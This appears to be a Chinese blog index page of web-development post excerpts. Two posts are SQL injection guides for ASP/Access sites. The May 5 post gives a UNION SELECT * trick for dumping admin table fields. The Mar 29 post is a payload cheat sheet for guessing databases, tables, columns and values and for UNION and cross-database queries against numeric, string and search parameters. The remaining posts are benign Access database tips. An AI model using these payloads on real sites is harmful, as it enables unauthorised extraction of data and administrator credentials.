May 5
此方法解决%90注入得到表的不到字段的网站,衷心感谢兄弟2月30日讨论!
我举动力文章的例子
他的是28个字段
加入admin表5个字段
那么union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
* 就是5个字段?
这样来爆admin里边的所有表明
但注意 * 确是代表了所有admin表的字段
如果正好比如username在可显示位置
他就会显示在页面上
我需要爆他的字段呢·
技术都有局限性 这个方法需要知道表名和一个字段名id
不需要其他字段 Read the rest of this entry
Apr 15
-A
ADD
ALL
Alphanumeric
ALTER
AND
ANY
Application
AS
ASC
Assistant
AUTOINCREMENT
Avg
-B
BETWEEN
BINARY
BIT
BOOLEAN
BY
BYTE
-C
CHAR, CHARACTER
COLUMN
CompactDatabase
CONSTRAINT
Container
Count
COUNTER
CREATE
CreateDatabase
CreateField
CreateGroup
CreateIndex
CreateObject
CreateProperty
CreateRelation
CreateTableDef
CreateUser
CreateWorkspace
CURRENCY
CurrentUser
-D
DATABASE
DATE
DATETIME
DELETE
DESC
Description
DISALLOW
DISTINCT
DISTINCTROW
Document
DOUBLE
DROP
-E
Echo
Else
End
Eqv
Error
EXISTS
Exit
-F
FALSE
Field, Fields
FillCache
FLOAT, FLOAT4, FLOAT8
FOREIGN
Form, Forms
FROM
Full
FUNCTION
-G
GENERAL
GetObject
GetOption
GotoPage
GROUP
GROUP BY
GUID
-H
HAVING
-I
Idle
IEEEDOUBLE, IEEESINGLE
If
IGNORE
Imp
IN
INDEX
Index, Indexes
INNER
INSERT
InsertText
INT, INTEGER, INTEGER1, INTEGER2, INTEGER4
INTO
IS
-J
JOIN
-K
KEY
-L
LastModified
LEFT
Level
Like
LOGICAL, LOGICAL1
LONG, LONGBINARY, LONGTEXT
-M
Macro
Match
Max, Min, Mod
MEMO
Module
MONEY
Move
-N
NAME
NewPassword
NO
Not
NULL
NUMBER, NUMERIC
-O
Object
OLEOBJECT
OFF
ON
OpenRecordset
OPTION
OR
ORDER
Orientation
Outer
OWNERACCESS
-P
Parameter
PARAMETERS
Partial
PERCENT
PIVOT
PRIMARY
PROCEDURE
Property
-Q
Queries
Query
Quit
-R
REAL
Recalc
Recordset
REFERENCES
Refresh
RefreshLink
RegisterDatabase
Relation
Repaint
RepairDatabase
Report
Reports
Requery
RIGHT
-S
SCREEN
SECTION
SELECT)
SET
SetFocus
SetOption
SHORT
SINGLE
SMALLINT
SOME
SQL
StDev, StDevP
STRING
Sum
-T
TABLE
TableDef, TableDefs
TableID
TEXT
TIME, TIMESTAMP
TOP
TRANSFORM
TRUE
Type Read the rest of this entry
Mar 29
(1)数字型
判断数据库:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from msysobjects)
猜表名:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from 表名)
猜列名:http;//127.0.0.1/a.asp?id=7 and (select count(列名) from 表名)>0
猜值:http;//127.0.0.1/a.asp?id=7 and (select top 1 asc(mid(列名,1,1)) from 表名)>N
猜字段数:http;//127.0.0.1/a.asp?id=7 order by N
UNION查询:http;//127.0.0.1/a.asp?id=7 union select 1,2,3,4...... from 表名
跨库:http;//127.0.0.1/a.asp?id=7 and exists (select count(*) from 数据库路径.表名)
(2)字符型
判断数据库:http://127.0.0.1/a.asp?id=4ed7 and exists (select count(*) from msysobjects) and ''='
猜表名:http://127.0.0.1/a.asp?id=4ed7 and exists (select count(*) from 表名) and ''='
猜列名:http://127.0.0.1/a.asp?id=4ed7 and (select count(列名) from 表名)>0 and ''='
猜值:http://127.0.0.1/a.asp?id=4ed7 and (select top 1 asc(mid(列名,1,1)) from 表名)>N and ''='
猜字段数:http://127.0.0.1/a.asp?id=4ed7 order by N and ''='
UNION查询:http://127.0.0.1/a.asp?id=4ed7 union select 1,2,3,4...... from 表名 and ''='
跨库:http://127.0.0.1/a.asp?id=4ed7 and exists (select count(*) from 数据库路径.表名) and ''='
(3)搜索型
判断数据库:http://127.0.0.1/a.asp?id=%54%20%87% and exists (select count(*) from msysobjects) and '%'='
猜表名:http://127.0.0.1/a.asp?id=%54%20%87% and exists (select count(*) from 表名) and '%'='
猜列名:http://127.0.0.1/a.asp?id=%54%20%87% and (select count(列名) from 表名)>0 and '%'='
猜值:http://127.0.0.1/a.asp?id=%54%20%87% and (select top 1 asc(mid(列名,1,1)) from 表名)>N and '%'='
猜字段数:http://127.0.0.1/a.asp?id=%54%20%87% order by N and '%'='
UNION查询:http://127.0.0.1/a.asp?id=%54%20%87% union select 1,2,3,4...... from 表名 and '%'='
跨库:http://127.0.0.1/a.asp?id=%54%20%87% and exists (select count(*) from 数据库路径.表名) and '%'='
Dec 19
<% ' 功能:压缩ACCESS数据库 Sub CompactDB(strDBFileName) Dim strOldDB,strNewDB,objFSO strOldDB = server.MapPath(strDBFileName) strNewDB = server.MapPath("New" & strDBFileName) Set objFSO = Server.CreateObject("Scripting.FileSystemObject") If objFSO.FileExists(strOldDB) Then ' 压缩数据库 Set Engine = Server.CreateObject("JRO.JetEngine") strPvd = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" Engine.CompactDatabase strPvd & strOldDB , strPvd & strNewDB Set Engine = Nothing ' 删除旧的数据库文件 objFSO.DeleteFile strOldDB ' 将压缩好的数据库文件拷贝回来 objFSO.MoveFile strNewDB, strOldDB Response.Write("数据库压缩完毕!") Else Response.Write("找不到指定的数据库文件!") End If Set objFSO = Nothing End Sub %> '调用方式: Call CompactDB("Database.mdb")
Dec 19
全国省市数据库李晓鹏整理版
Database.mdb是ACCESS版本,直接使用
Database.sql是SQL版本,直接导入即可
SQL版是晓鹏网上找来的,但我需要用的是ACCESS版,唉,因为用的SQL SERVER 2005,没法把SQL导出为ACCESS库,就用ASP写了个文件转换.
现提供下载!有问题请到http://www.lixiaopeng.org留言给我.整理时间:2008年12月19日02时44分20秒
Aug 9
在 web.config 中,ACCESS数据库连接字符串采用相对路径基本不存在问题:
<add name="AccessFileName" connectionString="~/App_Data/ASPNetDB.mdb" providerName="System.Data.OleDb" />
但是如果连接字符串中含有密码,则比较头痛了 :
<add name="NewsDB_PSWDConnectionString" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=App_Data\ASPNetDB.mdb; Jet OLEDB:Database Password=000"
providerName="System.Data.OleDb" />
此时,系统会报错:
'c:\windows\system32\inetsrv\App_Data\ASPNetDB.mdb'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
因为,在连接串中采用的相对路径系统并没有按我们的意愿从当前目录提取,此时,可使用如下的连接串即可:
<add name="NewsDB_PSWDConnectionString" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|\ASPNetDB.mdb; Jet OLEDB:Database Password=000"
providerName="System.Data.OleDb" />
当然数据库文件得放在App_Data目录下。如果不在此目录下,则需采用稍麻烦一些的方法:
在<appSettings>节中设置多个键值,数据源单独使用一个键值,然后在程序代码中用Server.MapPath方法获得其物理路径,在连接起来组成一个完整的连接字符串即可。